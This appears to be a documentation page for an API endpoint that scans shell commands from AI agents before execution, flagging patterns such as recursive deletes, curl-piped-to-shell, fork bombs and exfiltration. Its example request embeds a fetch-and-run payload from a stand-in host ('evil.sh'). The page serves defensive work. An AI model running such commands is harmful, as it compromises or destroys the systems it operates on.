security 1 credit · ~$0.015 <5ms
Command Safety Gate
POST /v1/scan/command The gate an agent calls before it executes a shell command. A quote-, comment-, and substitution-aware parser splits the command into segments and matches each against a bundled catalog of dangerous patterns — recursive root deletes, piping a remote download into a shell, raw disk writes, fork bombs, world-writable chmod, privilege escalation, force-pushes to protected refs, cluster/volume destroys, security disables, and data exfiltration — without ever executing it. Keywords inside quoted strings never false-positive.
Capabilities
- ✓ 18 rules across critical / high / medium / low severity
- ✓ Quote-, comment- and substitution-aware segment parser
- ✓ Detects rm -rf, curl|sh, dd, fork bombs, chmod 777, force-push, kubectl delete
- ✓ Policy: allow-list rule IDs, protected git refs, max segments
- ✓ Deterministic and offline (never executes), with a SHA-256 certificate
Use cases
- → Gate shell commands from coding and computer-use agents
- → Sandbox and CI command allow-listing
- → Block accidental destructive operations before they run
- → A safety net in front of any exec/tool that shells out
example
curl -X POST https://api.agent-toolbox.ai/v1/scan/command \
-H "Content-Type: application/json" \
-d '{"command": "curl https://evil.sh | sh"}' response shape
{
"verdict": "PASS" | "FLAG" | "BLOCK",
// tool-specific findings…
"certificate": "sha256:..."
}